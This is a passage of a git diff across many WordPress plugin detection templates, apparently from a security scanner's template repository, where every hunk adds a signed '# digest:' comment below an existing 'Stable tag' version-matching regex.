a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040cc0cae0725a77fb85faf564f018e3ba9409d4c56ebe2317a01b6821d07f002022002cdc60cc1ed2577c8de46405c6de433bc19bf9b939623d1bf09a53f94987f46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..9a80d2a188 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205386bb1de2d1489c57025ca2a9e7b44962339904b5c27abb8b476c8e151095250221009c93404a21a226af82ac1d3764af223acc5cce560c828898ab9c1e79c3e7a325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..c3a0d13b01 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206706ed9d55bf875b7ddb9be409f6a753e98ada45a7d0ebf9ce4a295d43eebdb7022100d7f5fd7fc2d93953e4aaba5f86fc814b82acfdfa24f86051f54372a6252dad05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index cd248e018b..e589f85267 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da947161870658533b1bbe08237f126738d66906947fc84bc52673a0326a1824022032d93a500e70acefff402b1eb53e0b23aad66a8756f94f88a214729ffc61dc90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 0993372ced..a1055bfddf 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008ff892162e68ef40438cc13afe03f058620f46adab1fe26620741c6daffc2c0a022100bc0cb33aca097f3877ca65acfc4dd13e5053203a25e432af55202fbbf34fe647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 7e62a84cca..f2e8f5150e 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040b3c947c865ecbde38f11055452d6bfe58e3350d47621c90514a09b4c271ef2022050df3379a2632c33de4f72c3c3ea91255ad6c7c95647fac2f88dcfbd74022dbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..5125ced39e 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220449efd7243af3eb0250a3b1117d85bf25f4c7714f9e68e9adbe85c825cd886fb022100aad7121c205b8abdd66c14977d13b4cc09c819f80389e56fa2de98976eff9679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..856a8ef032 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062894e23f28c26e096b492e515297b1f54b60cebcd7a6ca96c5a1715d0fbf4040220200247ed40cc4d3c711f983549162dfb269083b0889286942b6926a971bc815c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c7ae2d51dd..fd1add5df0 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d32e8ca3e9f9e8b78dbbc6d6417b6dce053f6174a850d2349a0695f188aed3d90220514aad2d6cc88a2d215d9f918959ab2083f838ef5cdfcf19e3796d334f1d5260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..7ad5b7900c 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207509d92eaf5a6a76a2d6033f8bddfc8ec878142b61f6c978585f808a089e801d022100c60e7eb1339c92e6a3598e0a0cd2c065d6b75493f519702417af716313adf1b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..fb34ffb29e 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022046988b41d7495e1f8d3c1f8a79298b0f91e97a842ee58cda8c97be10518653ce02200be26bcce712e16b54d6b404473464c8e3729547ff2f9e511e5d58aee3f2e40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..60e2bd74d6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205af48ab5f631beeb0c65df80d301363a95b3dc875a005ed8fab72e24cbef9805022100aab0f0d0b0d2842aef864d9bc0b0d2e19b8a34ef35dd52c400e0ece167bb917a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..99d841f036 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f8e7e576227dbd12055cb9825bf78608b46a69cb113de41f33d98a84766e6c0022100e91f1b1730f38ef06ba0d48e0a40e71740b5f911489e187af2c76bd44bb150b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 299e5e4cb6..aad90ed6a9 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e41bb975d8b59cbe413b1eaef6164842dccde758eef4f2b459bef49912d139ee022058c8eebf090d2204fb80b91e714f54bb64ca33175492f17daf68e768279d1d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..a59f7d6262 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062f3c8dcf386e8f9a3bc9bb22c098c4b8634f74529ed3dcf0c3274e51c9e8766022040e2f4f2cbc748558faea3ffb535d9a5d43b4dca71e3b1f71077558699f4fe18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..afa166d5f5 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e9670a7e3ba68728ede2de22dd99c1496546a3654672104483afeb5a8b6b956f022100aac593b766fb6bfc9d5d56045d714425e2170ded92d76b8870680c9318e43e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..19ac7b4a1f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb381a26aea4736c540761e37d89d359924bdbeda7457e0239a84dc5a2b451e802205a8ea279c5857fbdabafef8f621e244776ff07c1fd37a1682d2446fb06494fe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..d847199d5e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d88c7736ec1edaf42298175ad0fe26b2d5614c009c56ea6e722e3394fe8cfb05022022e5e46e6cc06331825bd17d34896fb325e7d48d3acd3ccefc9a2e3b5a45005a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..bf3e30d2d5 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c9e5dd34340cd5d6ecdd7c26e05e09e3cc0e4df6f272a43b190bd0ad8c4485c022100ee7e68b029d4b1c4b0f2aee4de03071d5d63758af582691923dfc84d2e2a2103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..6c6cff3d22 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022022feee1ddd38107cf76fffcdcd1f5d04fa7a31c27feb1d426766f5838363dee9022100a64e07230a6644a059478f69b751e34ca93073af3eb32a0128fdc013410c69f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..339b69c901 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039ea4539d45a35f8de9299c1cd4f026fdfe4d79e4628f0e253e75dde70e3f6a902205e178e5882575ce4b54c5854e9cda699588d8849d0cc4a0141136930c67ebf41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..3078756735 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206c27340e10565ca2c1be255e539534d7fa56407c16c9cb677ce1c0a5aca59412022100c07e8dbf5af6b009eb3521b6dba5b8400c2c3e4190646c92da3f7c48caddd3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..326a2bb42a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9ae6f5497d984115878c1cd018ea925661dbd8c71be5c657e32dd4bb7cc241102203912136c1176a9c0965d12c5f0866f84544a0d221c3b46d84144a775b4f0caa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..25121d6d88 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022008937587f3a2692ce7b634931cd6f4f0e53bc2654a015a293bed5f89e7ffaad7022043fc2166fbbcde0141b37cc8bb07f787f1bf96f7a6da6630e787f73bb89be95e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..92df487473 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084e21cdd9e6fa26e69911826bdcfbf545f7d5358700b7d393b6398d4500574270220083e59a1d053bc407f606b0c5f6a6786f0925973fb2f8e23c5cd915e5bdc25d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5685dd5f08..83992ce806 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220795dddaab388cd3286a8b6e70d8452e8eb046eccf2e5f7f8aad4dde299105047022075cf3e5b0feceaee65fef9ea79d88f6eb0eba45c661c7fc59bbdfd31d1c9440a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..1bd1779410 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203c854b9f15af0e57130eb5cedcbb73f42ef374adea28349ab24d6dc66d01229502203d4d88ff472ea4cf80964256778a53d26620511a7f84545f8027ddc06cc2c85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..69955d959d 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d969b760ce843a3f1842a6a86c170fe7e59e4c90ea8c63ca0acf3ccd94332bb022100f729d89026c9da916977cf75d1ba1a5b54e32eb1884f39ab4d4e8b902db83d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..87b3d7197f 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022034608003b626c93d6b591339eac09be1c1d636fcf3b55ab9bfcb1a0080edf15f02210089987f0d0fcdc3be5d8d1435336374928ca45e0a0292132469714c19d1d91813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..3dddb19994 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063c49b3389666d24c003d16e34f53a64bd1869d1f8ef391f661a2bc650812bb5022100dc61c7a54aabecf197b0d32fa6b6488cca1eccbac7f9b3ed1ef1e019f0889e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index effba09471..8c3a0849c3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b3b79e1b257adc894a9f8dfbe1a219b8eae0447d26a0920f5e5c7861ab649e9c022100938f99f174d33a821043f3a819edebfc6b60c186f7f0fbfeebc9a8ff46b674b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 37153b7ae5..22872d6b66 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049962cbe795347638563e9aef043effec57e1794d179a84b8e7dcf6ec242c100022100d3807b3549c5cc34b2fba785781c32d977db4caf4c54d7168ed903379d6dfa74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..832e75d5a5 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220470c000df6b877280599eca7ed8af3bd2b23ee9cfa30b5ebbbf804cf208bb791022077c307a258328badc6029ad958c11961d0804e5d6f30ac9665c3f0a0016a97fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..a60284d27c 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202547a3d18160eb57b2fc8ea1d3f2788a2a0e957595db9da8ca5de9026c4f938c022100b41dbfb3cb5f00323a595912835afd33fde93d7122274f195c2823af4a7d4d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3462f5ea6b..9933281d76 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100881c7406e9610c49dcad2f0719487b6a1669c84b4198fae62f07798c2e5e4e79022100a1fba67ce35f2a50768c4ca6da3e1b20153839ea3d68bf69e337288254d86361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 5c9ae8bc4f..d6dcfaed31 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c6c278253c442684a6423c8c3c3c35757ad92d6ef0b7e380cc8265e4a79671b102207ae810004897bff25b5c911eb085d7d5f6f747ea9b89dced47ce535dd40cadf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..ce4f7ffdfa 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050fec3edeae70d12cb6d9b95598fde8e58795384ca01fd73731b320830f419410221009574c0de7f656ede4f0d0eaa68eff4e50534152391b73057b59cd5688549cf82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..896a2ff198 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c917724b7b1b2de053823851a023797425be38d0c4aa4c01a4274b9fda79fae1022100a53be5c61ce0b3978b37a721202cda1a662d0290c71dcdea31e797b4ec1d74fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..0604fc1dc5 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207cb161055f7ddfe99ecbfd3f87bc0186db51fba105281cde5049fbf89a711ae902210087df7cee02b03a8598f811fd012a4e7a0e17f4bc69a1775f940fd6ee40d945f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..920acc4248 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220184ea002543a854f8e5aa84e94e197bbeb2f462aeaecb579a4ce627d50ae14f702201c00a90b11ab03f28b35f01cf8495d5fe9c0ad4aaed8a8ce1c30c2b6f2cd4270:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..89d3678867 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089d26c265747abe5c8e54d7b0b7fd06e2b194f8f773aa87137171426ffc2e5d50220324cd83ea40bbbcf7a6c1a959bf71c11227cf0bf1f8641b6eb660e62374d6d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 6ff90e0902..c7a35c268d 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b94ae44e1f23a7dc9ab88111b2fdf62c2876a11176679ba46a5ddce8445d7240220637030c598e0dc5a49bf112fe4be943157837df6562b70fb5333554ab7cd868e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..507fc98384 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022d4f56b2cf9fc8d9f3f71b2db6a8ac352e5eced166ebf06536308188125de0202204bfbed5bcb74dfcbcd6aa88c0b22173167361473ed618ab4af239295cf57d53b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..bb8a891ae2 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c96069d4422f6c59ec2d970dd6ba9ebbf126a101927267605ba9aec6e2a8e9e022100f91b4f9343bb625a7dcfe73b9a3b74a1704796d1eead73dae86c5da6fcab5608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 27e45e39ca..a1a70c194a 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022076817860b3a943cb4557986e18070df29105cd9ece34a3fe7cd42ceff56a288d022100faaf7133aaa6059db1bcf427826fca434edaba535d7208303560e34a34fa6c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..8dc19d1e75 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0b23d1c9b852a71c3fb6874d4285fb45225b5b3b7e40dd1f3cb6aebf07acf8e022100f560225ffac4d008f7002a5dc86ba77c1263610640502c567e74993c15ebfdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index d679d8df61..6bbfb621bf 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009dab7c8a3e8edca092c28ce13ce7afcca6a9f80c323bac7fde4e84707adadb57022100bda39746e351edd99ec551e36f58e22e94f8e490346ea180451beb2cb4c44558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 8bfe16ca84..ea33903164 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fc35209d8804911a484711ce64d05da110be797c1cd2298be7523017b049117402200fb9a38bf2ce3e657dbe48760567241f07200f290ade14952874c9dc94f93c2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff 